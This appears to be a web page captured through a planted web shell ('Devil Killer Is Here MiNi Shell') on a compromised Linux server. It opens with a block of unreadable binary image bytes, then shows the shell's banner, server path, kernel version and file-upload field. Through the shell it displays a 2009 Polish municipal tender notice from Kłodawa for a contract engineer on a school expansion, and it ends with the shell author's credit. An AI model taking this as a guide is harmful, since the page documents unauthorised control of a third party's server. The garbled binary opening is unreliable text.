JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090422/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090422/117024-N-2009.html

<p class="kh_header"><b>Kłodawa: Pełnienie funkcji inżyniera kontraktu na zadaniu - Rozbudowa budynku Zespołu Szkół w Kłodawie o gimnazjum, łącznik oraz salę sportowo - rehabilitacyjną.</b><br>
<b>Numer ogłoszenia: 117024 - 2009; data zamieszczenia: 22.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kłodawa , ul. Gorzowska 40, 66-415 Kłodawa, woj. lubuskie, tel. 095 7216665, 7216670, faks (095) 721 66 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.klodawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inżyniera kontraktu na zadaniu - Rozbudowa budynku Zespołu Szkół w Kłodawie o gimnazjum, łącznik oraz salę sportowo - rehabilitacyjną..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa stanowiąca przedmiot zamówienia będzie obejmować m.in.:
 - Weryfikację i kontrolę dokumentacji projektowej ze specyfikacjami technicznymi,  przedmiarami i kosztorysami inwestorskimi,
- sprawdzenie w terenie zgodności stanu istniejącego z dokumentacją projektową i opracowanie na tej podstawie SIWZ na roboty budowlane, 
- Współudział w postępowaniu przetargowym na wybór Wykonawcy robót budowlanych (m.in. udzielanie wyjaśnień do SIWZ, sprawdzenie i ocena ofert przetargowych),
- Zarządzanie i pełnienie funkcji Inżyniera Kontraktu w trakcie realizacji przedsięwzięcia budowlanego, który obejmuje kompleksową obsługę techniczną zadania inwestycyjnego, 
- Nadzór inwestorski nad robotami budowlanymi, prowadzony poprzez ustanowionych inspektorów nadzoru inwestorskiego we wszystkich wymaganych prawem dla przedmiotowego zadania inwestycyjnego branżach, 
- Nadzór finansowy i prowadzenie pełnej sprawozdawczości oraz rozliczeń środków własnych Zamawiającego oraz środków pozyskanych na realizację inwestycji przez Zmawiającego, 
- Obsługę okresu gwarancyjnego wykonanych robót z tytułu gwarancji jakości i rękojmi, który będzie obejmował,
- Inicjowanie i organizowanie przeglądów gwarancyjnych, 
- Prowadzenie i nadzorowanie spraw, związanych z usuwaniem ewentualnych wad i usterek oraz organizowanie i przeprowadzenie odbioru ostatecznego.

Szczegółowy zakres obowiązków, które Inżynier Kontraktu będzie musiał wykonać zawiera wzór umowy, który stanowi załącznik nr 6 do niniejszej specyfikacji istotnych warunków zamówienia, zwanej dalej SIWZ.

W ramach inwestycji zostanie rozbudowany budynek Zespołu Szkół w Kłodawie o gimnazjum (obiekt II kondygnacyjny niepodpiwniczony z dachem płaskim o kącie nachylenia połaci dachowej 3o i 15o), łącznik - aula oraz salę sportowo-rehabilitacyjną (obiekt I kondygnacyjny). Budynek sali sportowo-rehabilitacyjnej z łącznikiem połączony będzie bezpośrednio z istniejącym budynkiem oraz z projektowanym budynkiem gimnazjum. Zakres inwestycji będzie obejmował również zakup wyposażenia oraz wykonanie zagospodarowania terenu.
Przewidywany termin rozpoczęcia robót budowlanych - III kwartał 2009r. natomiast termin zakończenia robót budowlanych - IV kwartał 2011r.

Dane ogólne o obiektach:
Powierzchnia użytkowa		                            4 562,54 m2
- budynek gimnazjum		                            1 865,17 m2
- budynek sali sportowo - rehabilitacyjnej z łącznikiem 2 697,37 m2

Powierzchnia zabudowy		                             4 094,81 m2
- budynek gimnazjum		                             1 153,09 m2
- budynek sali sportowo - rehabilitacyjnej z łącznikiem  2 941,72 m2

Kubatura		                                       25 461,68 m3
- budynek gimnazjum		                              6 155,06 m3
- budynek sali sportowo - rehabilitacyjnej z łącznikiem  19 306,62 m3.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.23.15.40-4, 74.26.40.00-7, 74.00.00.00-9, 74.31.30.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium w wysokości 8 000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy nie podlegający wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy, spełniający warunki zawarte w art. 22 ust.1 pkt 1-3 ustawy i spełniający poniższe następujące warunki udziału: 
1.1 wykażą, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej 1 usługę  odpowiadające swoim rodzajem przedmiotowi zamówienia.
Przez usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia Zamawiający rozumie, że Wykonawca pełnił funkcję Inżyniera Kontraktu (Inwestora Zastępczego) przy budowie obiektu użyteczności publicznej (zdefiniowanego w § 3 pkt 6 Rozporządzenia Ministra Infrastruktury sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie), o kubaturze nie mniejszej niż 20 000 m3 i wartości inwestycji nie mniejszej niż 8,00 mln PLN netto, 
1.2 dysponują osobami zdolnymi do wykonania zamówienia lub będą dysponować takimi osobami, posiadającymi niezbędne kwalifikacje tj.: 
a) zapewnią 1 osobę, która posiada co najmniej 5 letnie doświadczenie w sprawowaniu nadzoru oraz uprawnienia do nadzorowania (kierowania) robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń, 
b) zapewnią 1 osobę, która posiada co najmniej 5 letnie doświadczenie w sprawowaniu nadzoru oraz uprawnienia do nadzorowania (kierowania) robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych, kanalizacyjnych i gazowych,
c) zapewnią 1 osobę, która posiada co najmniej 5 letnie doświadczenie w sprawowaniu nadzoru oraz uprawnienia do nadzorowania (kierowania) robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych,
d) zapewnią 1 osobę, która posiada minimum 3 letnie doświadczenie w przygotowaniu dokumentacji przetargowych i posiada wiedzę z zakresu procedur przetargowych,
e) zapewnią 1 osobę, która posiada minimum 3 letnie doświadczenie w rozliczaniu inwestycji,
f) zapewnią 1 osobę, która posiada doświadczenie w pełnieniu funkcji Inżyniera Kontraktu przy budowie minimum 1 obiektu użyteczności publicznej (zdefiniowanego w § 3 pkt 6 Rozporządzenia Ministra Infrastruktury sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie), o kubaturze nie mniejszej niż 20 000 m3 i wartości inwestycji nie mniejszej niż 8,00 mln PLN netto,
Zamawiający dopuszcza łączenie maksymalnie dwóch funkcji przez jedną osobę w przypadku posiadania kilku rodzajów uprawnień lub kwalifikacji.

Ocena spełnienia warunków zostanie dokonana zgodnie z formułą spełnia/ nie spełnia na podstawie analizy dokumentów i oświadczeń załączonych do oferty, wymienionych w Rozdziale 6 SIWZ. Z treści dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca w swojej ofercie przedstawi następujące dokumenty:
1. Wypełniony i podpisany Formularz Oferty stanowiący Załącznik nr 1do SIWZ, 
2. Dowód wniesienia wadium (kserokopia),
3. Pełnomocnictwo dla osoby/osób podpisujących ofertę, jeżeli upoważnienie takie nie wynika wprost z dokumentów rejestracyjnych firmy,
4. Oświadczenie Wykonawcy, że spełnia warunki określone w art. 22 ust.1 ustawy. W/w oświadczenie powinno być złożone na druku stanowiącym Załącznik nr 2 do SIWZ - w przypadku podmiotów wspólnie ubiegających się o zamówienie, oświadczenie podpisuje lider konsorcjum i każdy ze wspólników spółki cywilnej. Z oświadczenia musi wynikać w imieniu kogo jest ono składane (nazwa firmy/firm).
5. Zakres robót, które zostaną zlecone podwykonawcom. Informacja na ten temat powinna być złożona na druku stanowiącym Załącznik nr 3 do SIWZ.
6. Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia. W/w wykaz powinien być złożony na druku stanowiącym Załącznik nr 4 do SIWZ. Do wykazu należy załączyć stosowne uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie oraz zaświadczenia o przynależności do właściwej izby samorządu zawodowego potwierdzające, że w/w osoby posiadają wymagane ubezpieczenie od odpowiedzialności cywilnej. W sytuacji kiedy Wykonawca będzie dysponował osobami zdolnymi do wykonania zamówienia musi przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. Wymagania dotyczące w/w osób zostały opisane w Rozdziale 5.1.2 SIWZ - w przypadku podmiotów wspólnie ubiegających się o zamówienie, informacje i dokumenty dotyczące personelu załącza do oferty tylko jeden podmiot. 
7. Wykaz wykonanych w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług odpowiadających swoim rodzajem przedmiotowi zamówienia wraz z dokumentami (np. referencje) potwierdzającymi, że zostały one wykonane należycie. W/w wykaz  powinien być złożony na druku stanowiącym Załącznik nr 5 do SIWZ. Wymagania dotyczące w/w usług zostały opisane w Rozdziale 5.1.1 SIWZ. 
8.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
9. Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału
Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed terminem składania ofert.
10. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt.4 - 8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
11. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt.9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

Dokumenty załączone do oferty mogą być przedstawione w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub przez osobę uprawnioną do składania oświadczeń woli w imieniu Wykonawcy z zastrzeżeniem postanowień zawartych w punkcie 9.5 SIWZ.



Uwaga!
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, stosuje się do przepisów § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2006r. Nr 87, poz. 605 ze zm.)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.klodawa.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kłodawa ul. Gorzowska 40, 66-415 Kłodawa od poniedziałku do piątku w godzinach pracy urzędu..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2009 godzina 10:00, miejsce: Urząd Gminy Kłodawa ul. Gorzowska 40, 66-415 Kłodawa, sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com